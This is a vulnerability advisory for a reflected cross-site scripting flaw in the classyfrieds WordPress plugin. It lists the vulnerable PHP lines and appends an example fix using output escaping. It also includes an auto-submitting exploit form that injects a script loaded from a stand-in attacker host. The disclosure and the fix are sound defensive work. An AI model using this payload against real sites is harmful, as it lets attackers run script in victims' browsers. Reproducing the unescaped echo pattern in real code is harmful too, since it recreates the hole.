Advisory #: 1325
Title: Reflected XSS in wordpress plugin classyfrieds v3.8
Author: Larry W. Cashdollar, @_larry0
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/classyfrieds
Downloads: 8698
Vendor Notified: 2016-02-09
Vendor Contact: plugins@wordpress.org
Plugin Name: classyfrieds
Vulnerability:
There is a reflected XSS vulnerability in the following PHP code in ./classyfrieds/themefiles/page-classyfried_add_listing.php:

227: <input type="text" name="titel" class="inputy" maxlength="50" required value="<?PHP echo $_POST['titel']; ?>" >
238: <input type="text" name="subtitle" class="inputy" maxlength="50" value="<?PHP echo $_POST['subtitle']; ?>">
252: <textarea name="omschrijving" class="texty" rows="8" required ><?PHP echo $_POST['omschrijving']; ?></textarea>
539: <input type="text" name="zip" class="inputy" maxlength="50" value="<?PHP echo $_POST['zip']; ?>">
555: <input type="text" name="versie" class="inputy" maxlength="50" value="<?PHP echo $_POST['versie']; ?>">
578: <input type="text" name="create_cat" class="inputy" maxlength="49" value="<?PHP echo $_POST['create_cat']; ?>">
593: <textarea name="installatie" class="texty" rows="6" ><?PHP echo $_POST['installatie']; ?></textarea>
606: <input type="url" name="url" class="inputy" maxlength="50" value="<?PHP echo $_POST['url']; ?>">
619: <input type="text" name="prijs" size="7" maxlength="7" value="<?PHP echo $_POST['prijs']; ?>"><?PHP echo $cfl[f_prexpl]; ?>
671: <input type="text" name="sleutelwoorden" class="inputy" maxlength="50" value="<?PHP echo $_POST['sleutelwoorden']; ?>" ><?PHP echo $cfl[f_keyexpl]; ?>
684: <input type="text" name="contactname" class="inputy" maxlength="50" value="<?PHP if (!empty($current_user->user_login)) echo $current_user->user_login; else echo $_POST['contactname']; ?>" >
697: <input type="text" name="contactmail" class="inputy" maxlength="50" value="<?PHP if (!empty($current_user->user_email)) echo $current_user->user_email; else echo $_POST['contactmail']; ?>" >

The variable titel appears to send unsanitized data back to the user's browser via a POST request.
CVE-ID: Not Released
File:./classyfrieds/themefiles/page-classyfried_add_listing.php
Exploit Code:
The exploit was derived from the first appearance of a vulnerable parameter in the code; there could be more, as shown above.

This is an untested autogenerated exploit:
XSS POST exploit modified from http://blog.portswigger.net/2007/03/exploiting-xss-in-post-requests.html

<form name=TheForm action=http://[target]/wp-content/plugins/classyfrieds/themefiles/page-classyfried_add_listing.php method=post>
<input type=hidden name=titel value=&quot;&gt;&lt;script&#32;src=http://attacker/bad.js&gt;&lt;/script&gt;>
</form>
<script>
document.TheForm.submit();
</script>
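A corrected rendering of the echoed fields, as an added example that is not part of the advisory or the plugin's own code: it assumes WordPress's esc_attr()/esc_textarea() and falls back to htmlspecialchars() so it also runs on a bare PHP CLI.

```php
<?php
// Added example, not code from the advisory or the classyfrieds plugin:
// the attribute-echo pattern from page-classyfried_add_listing.php beside
// a corrected version. Runs outside WordPress: esc_attr()/esc_textarea()
// fall back to htmlspecialchars() when WordPress core is not loaded.

if (!function_exists('esc_attr')) {
    function esc_attr($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    }
}
if (!function_exists('esc_textarea')) {
    function esc_textarea($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    }
}

// Vulnerable (as at plugin line 227): $_POST['titel'] is echoed straight
// into an attribute value, so a submitted double quote closes the attribute
// and whatever follows is parsed as markup.
function render_title_field_vulnerable(array $post): string {
    $titel = $post['titel'] ?? '';
    return '<input type="text" name="titel" class="inputy" maxlength="50" required value="'
        . $titel . '" >';
}

// Fixed: identical markup, value escaped for the attribute context.
function render_title_field_fixed(array $post): string {
    $titel = $post['titel'] ?? '';
    return '<input type="text" name="titel" class="inputy" maxlength="50" required value="'
        . esc_attr($titel) . '" >';
}

// Fixed equivalent for the <textarea> fields (omschrijving, installatie),
// where the closing tag rather than a quote is what must not survive.
function render_description_field_fixed(array $post): string {
    $text = $post['omschrijving'] ?? '';
    return '<textarea name="omschrijving" class="texty" rows="8" required >'
        . esc_textarea($text) . '</textarea>';
}

// Constructed sample input containing the characters each context must neutralise.
$sample = ['titel' => '"><b>x</b>', 'omschrijving' => '</textarea><b>x</b>'];
echo render_title_field_vulnerable($sample), "\n";
echo render_title_field_fixed($sample), "\n";
echo render_description_field_fixed($sample), "\n";
```

Running it shows the first line with the attribute broken open and the other two with the input rendered inert as entities; the same esc_attr() change applies to every input line listed in the advisory, and esc_textarea() to the two textarea lines.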